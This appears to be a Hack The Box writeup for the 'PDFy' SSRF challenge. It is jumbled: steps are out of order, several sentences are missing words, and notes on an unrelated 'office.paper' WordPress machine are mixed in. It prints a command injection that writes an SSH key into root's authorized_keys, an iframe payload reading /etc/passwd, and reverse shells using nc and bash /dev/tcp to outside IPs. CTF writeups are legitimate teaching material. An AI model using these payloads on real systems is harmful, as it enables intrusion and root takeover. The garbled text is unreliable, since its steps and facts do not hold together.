PDFy — HTB Writeup
Since the HTB challenge environment is remote, your local server must be reachable. Use ngrok (or a VPS) to create a public tunnel:
sudo /usr/local/bin/pdf_convert.py "test; echo '$(cat id_rsa.pub)' >> /root/.ssh/authorized_keys;"
Crafted PDF with title:
machine is an easy-difficulty Linux box. A high-quality writeup (or "paper") for this machine should follow a professional structure similar to the official HTB sample report:
Enumeration: Document the scan identifying ports 22, 80, and 443.
Vulnerability Discovery: Note the X-Backend-Server header, which reveals the office.paper hostname. Mention using to find vulnerabilities in the WordPress site.
: Explain the discovery of the chat.office.paper
<img src="http://127.0.0.1:8080/generate?html=<iframe src='file:///etc/passwd' />">
When you start the PDFy machine, you are presented with a simple web application. The core functionality allows a user to submit a URL. The backend server fetches the content of that URL, converts it into a PDF document, and then presents a link to download the generated PDF.
Example using bash -i:
The core functionality—fetching a remote URL and rendering it—is a textbook indicator for potential .
Input the URL of your hosted redirect script into the PDFy web form (e.g., http://your-server-ip/index.php). The PDFy server sends a request to your server.
# Establish a reverse shell
os.system('nc 10.10.14.12 4444 -e /bin/bash')
ngrok http 8080
Because the application blindly trusts any URL submitted to /api/cache, we can force wkhtmltopdf to fetch and convert internal resources (such as file:///etc/passwd) by embedding special directives in a crafted HTML page.
If the engine parses custom HTML, an attacker might typically inject:
By inspecting the metadata of the generated PDF files (using tools like exiftool or by looking at the PDF's properties), you can identify the backend engine: .
: In many HTB "PDF" challenges, common engines include wkhtmltopdf, dompdf, or PDFKit.
🚀 Step 2: Identification & Exploitation
$ echo "<?php system('bash -i >& /dev/tcp/10.10.14.16/4444 0>&1'); ?>" > shell.pdf